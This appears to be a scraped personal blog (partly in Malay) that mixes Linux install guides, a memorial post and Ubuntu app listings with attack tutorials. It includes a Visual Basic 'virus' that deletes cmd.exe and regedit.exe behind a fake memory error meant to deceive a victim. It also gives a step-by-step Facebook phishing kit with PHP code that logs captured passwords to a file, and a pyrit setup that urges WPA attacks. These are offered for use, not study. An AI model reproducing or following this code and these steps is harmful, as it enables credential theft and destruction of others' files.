installing Virtual box on Backtrack 5 or ubuntu

assalamu’alaikum..

bg pnguna2 backtrack 5 n ubuntu,kl korg nk pakai windows lam ubuntu or bt5,korg leh pakai command ni..command ni 100% leh pakai..ak dpt dr sorg kawn kt US rsenye..charles..die yg ajr ak n ak xnk lokek ilmu tuk share kn kt cni..korg leh la cb.. :)
———————————————————————————————————————————————————-

root@bt # prepare-kernel-sources

root@bt # cd /usr/src/linux

root@bt # cp -rf include/generated/* include/linux/

root@bt # echo deb http://download.virtualbox.org/virtualbox/debian lucid contrib non-free >> /etc/apt/sources.list

root@bt # wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -

root@bt # apt-get update

root@bt # apt-cache search virtualbox

root@bt # apt-get install virtualbox-4.0

 

———————————————————————————————————————————————————-

VIRUS SCRIPT in VISUAL BASIC

Private Sub Form_Load()
Text1.Text = “C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub

Private Sub Form_Load()
Text1.Text = “C/Windows/System32/cmd.exe”
A = Text1.Text
End Sub
Private Sub Command1_Click
Kill A
End Sub

Private Sub Form_Load()
Form1.Visible = False
Text1.Text = “C:/Windows/System32/cmd.exe”
A = Text1.Text
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
End Sub
Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Timer1.Enabled = False
End Sub

Private Sub Form_Load()
Form1.Visible = False
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
Kill “C:/Windows/System32/cmd.exe”
Kill “C:/Windows/regedit.exe”
End Sub

Now many of you feel that creating a virus is impossible especially for you beginners. Well this tutorial shows you how to create a simple virus with just a few lines of code. A virus can be an application that deletes files upon request, this is seen as infecting your computer because by deleting key files you may need to take action to get your computer back to normal.
First of all open a new Visual Basic project, a standard exe file..
Now it depends on how you want your virus to work, I feel it is best if it is activated once your application is opened so the main code codes in the form load sub.
On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on.
In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab.
Private Sub Form_Load()
Text1.Text = “C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub
Once the project is opened then the command file will be removed.
Now I will show you an example of doing this using a command button. Put the following code in the command button and in the form load.
You can even give the text box a name to make it quicker. I have labelled it ‘A’
Private Sub Form_Load()
Text1.Text = “C/Windows/System32/cmd.exe”
A = Text1.Text
End Sub
Private Sub Command1_Click
Kill A
End Sub
Now once the command button is clicked on the project the command file will be deleted.
Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn’t got enough memory to run, but in actual fact the victim doesn’t know that you have just removed their command file.
Here is to go about it…
Private Sub Form_Load()
Form1.Visible = False
Text1.Text = “C:/Windows/System32/cmd.exe”
A = Text1.Text
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
End Sub
Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Timer1.Enabled = False
End Sub
All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that’s how simple it can be to fool someone.
Right, we can now make it a little more difficult if you are finding the above a little too easy.
How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well.
The example below shows how to remove the files when the application is loaded, we will not be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below.
So in the form load part put the following code.
Private Sub Form_Load()
Form1.Visible = False
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
Kill “C:/Windows/System32/cmd.exe”
Kill “C:/Windows/regedit.exe”
End Sub
So above we will be removing the command file and the registry, I don’t think the victim will be best pleased about that do you.
Now I have shown you the above information I think it’s your turn to try and create your own, now you can test it on your own pc, just copy a file, lets say the cmd.exe file and paste it into your C:/
Then put in the code above but in the Kill put this…
Kill “C:/cmd.exe”
That’s all you need to kill, then you will see the file has been removed. Keep trying new things like I have shown and you will be a pro in no time. I hope you enjoyed this……….

Setahun Pemergian Arwah Sahabatku Syaufiq Farhan (Paan)

Assalamu’alaikum….

Sedar xsedar,dah genap setahun kembalinya salah seorang sahabatku Syaufiq Farhan a.k.a Paan ke pangkuan Illahi pada 29 Januari 2011…Al-Faatihah buat arwah…

Alhamdulillah, pada hari Jumaat malam sabtu lepas,aku,Amran,Ayoi,Kiko,Bana,Amri,Syafiq berpeluang buat bacaan Yaasiiin buat arwah…walaupun xramai yg dapat join,ak dah cukup bersyukur sbb boleh lpskn ‘rindu’ kt arwah….thnx pada korg…yg xdpt join tu,boleh la buat kt rumah sendiri kn…xde masalah pun…huhu

Insya-Allah,ade masa free nt,ak nk g gak jenguk kubur arwah…walaupun setahun dah berlalu,ak xpernah lupakan arwah…walaupun kejap sahaja perkenalan kami,tapi,banyak sngt kenangan dngn arwah…semoga roh arwah senantiasa dicucuri rahmat dr Allah…

Ni jelah yang aku nk updatekan buat masa skrg…aku rindukan semua kawan2 aku…rindukan family aku…semoga hidup kita semua sentiasa diberkati oleh-NYA…Aamiinn…

salam

“Jazakumullahu Khairan Kathiiraa…”

Installing pyrit on bactrack 5 or Ubuntu/Blackbuntu

Following command will create main directory tree for installation with svn support.
Code:

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn

We have just created a dir /pyrit_svn.This will install libs and other stuff that are needed:

Code:

apt-get install libssl-dev
apt-get install scapy
apt-get install python-dev

Going to construct pyrit

Code:

cd pyrit_svn/pyrit
python setup.py build
python setup.py install

Verify now if works typing pyrit on a command line. Now,find some dictionary for WPA, n start your attack!!

-Be smart- :)

Facebook Phishing

Today we are going to make a phisher for facebook.

1) go to facebook, and view the source, copy all the text to notepad.

2) we need to change some codes so press: Control + F

3) search for action

4) You should get: action=www.facebook.com/login and bla bla bla

5) delete all the facebook.com crap, and put: lol.php

6) beside action you will see something saying: method=post

7) change “post” to “get” save the file, name it: index.php and save it to desktop but remember! where it says: “save as type” change

it to “all files” this is very important

9) make a new file in notepad, and put this code:

<?php

header(”Location: http://www.Facebook.com/login.php “);

$handle = fopen(”passwords.txt”, “a”);

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

10) now save it as lol.php and remember the save as file type to all files.

11) now, make a new file in notepad, dont write anything, save it as: passwords.txt

12) now upload all of them in www.t35.com

good luck and good phishing!

tuxtype

Application: TuxType

What it is:

TuxTyping is an educational typing tutorial game starring Tux, the
Linux Penguin. The player guides Tux to eat fish which are falling
from the top of the screen. Each fish has a letter written on it. When
the player presses the corresponding key, Tux will position himself to
eat the fish. The game is intended for children learning to type,
though it does have higher difficulty levels which even experienced
typists may find challenging.

To know more about:

http://tux4kids.alioth.debian.org/tuxtype/

To install in Ubuntu:

sudo apt-get install tuxtype

bird

Application: BIRD

What it is:

Bird is internet routing daemons which manages TCP/IP based routing
protocols with full support of all modern routing protocols, easy to
use configuration interface and powerful route filtering language.

Features:

It supports IPv4 versions OSPFv2, RIPv2 (No v1), BGP and
redistribution between the protocols with a powerful configuration
syntax.

To know more about:

http://bird.network.cz/

To install in Ubuntu:

sudo apt-get install bird

miro

Application: Miro

What it is:

Miro (previously known as Democracy Player) is a platform for Internet
television and video.
It allows you to download and watch videos from RSS feeds (including
podcasts, video blogs, and BitTorrent feeds).

Features:

Miro can automatically download videos from RSS-based “channels”,
manage them and play them. The application is designed to mesh with
other PCF products such as Video Bomb, a social tagging video website,
and the Channel Channel, a TV guide for Internet television.

Miro integrates an RSS aggregator, a BitTorrent client (based on
libtorrent), and a media player (VLC media player under Windows,
QuickTime under Mac OS X, and Xine Media Player or GStreamer under
Linux). Since 2.0, Miro supports the adding of website bookmarks under
the “Sites” category; by default, ClearBits.net is preloaded in Miro
as a bookmark.

Examples of supported video files are QuickTime, WMV, MPEG, AVI, XVID
as a video player. It also supports RSS BitTorrent. When a new video
is available, the program will notify and download if possible.

The Miro Video Converter, a separate free program, converts video formats.

To know more about:

http://www.getmiro.com/

To install in Ubuntu:

sudo apt-get install miro

swftools

Application: SWFTools

What it is:

SWF Tools is a collection of SWF (Flash) manipulation and creation utilities.

Features:

The central tool is swfc which takes as input a description of a Flash
animation in a simple language and creates as output an SWF file. It
is possible to include ActionScript scripts into the generated SWF
file. SWFTools also includes the RFXSWF Library which allows to write
programs that generate SWF.
In addition SWFTools includes a number of tools to convert content in
the PDF, JPEG, GIF, WAV and AVI formats to SWF, and others to extract
information and content from existing SWF files. It’s also possible to
embed other SWF files, which may be useful for animating static
pictures (for example, the static SWF files generated by
OpenOffice.org Impress and Draw).

To know more about:

http://www.swftools.org/

To install in Ubuntu:

sudo apt-get install swftools

Celtx

Application: celtx

What it is:

Celtx is the world’s first all-in-one media pre-production software. It has
everything you need to take your story from concept to production. Celtx
replaces ‘paper, pen & binder’ pre-production with a digital approach that’s
more complete, simpler to work with, and easier to share.

Features:

*Multi-Media Friendly*
Celtx helps you pre-produce all types of media – film, video, documentary,
theater, machinima, comics, advertising, video games, music video, radio,
podcasts, videocasts, and however else you choose to tell your story.

*All In One*
Unlike scriptwriting software and sites, you can use Celtx for the entire
pre-production process – write scripts, storyboard scenes and sequences,
develop characters, breakdown & tag elements, schedule production, and prepare
detailed and informative production reports for cast and crew.

*Fully Integrated*
Celtx is designed to help your entire production team work together on a
single, easy to share project file – eliminating the confusion of multiple
project files, and the need for ‘paper and binder’.

*World Community of Media Creators*
More than 500,000 media creators in 160 countries create with Celtx in 28
different languages. Celtx is used by independent filmmakers and studio
professionals, and by students in over 1,800 universities and film schools -
many that have adopted Celtx for teaching and class work submission.

*The Best of The Desktop & The Web*
Celtx is a desktop application that delivers the most fluid writing and
editing experience. You can always keep your fingers moving as fast as your
thoughts and your creative flow is never interrupted. With Celtx you can also
work at any time off-line and privacy is never a concern.

Celtx Studios use the web to deliver a central server’s superior strength for
heavy-lifting tasks such as mass storage, collaboration and e-commerce.

No other film production software gives you the advantages of the Celtx-Celtx
Studios hybrid desktop-web architecture.

*Non-Linear Project Development*
Unlike scriptwriting software and sites, Celtx puts a choice of fully
integrated development tools right at your fingertips, giving you total
flexibility to determine how your story takes shape.

To know more about:

http://celtx.com/

To install in Ubuntu:

sudo apt-get install celtx

Kazam

Application: kazam

What it is:

A program that lets you record action on-screen into one video file.

Features:

It’s special features include a well designed interface, the ability
to record audio playing on your computer and built-in exporting
capabilities to upload screencasts to popular videosharing websites -
such as YouTube.

To know more about:

http://www.omgubuntu.co.uk/2010/09/kazam-0-1-available-the-screencasting-bar-on-linux-just-got-raised/

To install in Ubuntu:

sudo add-apt-repository ppa:and471/kazam-daily-builds

sudo apt-get update && sudo apt-get install kazam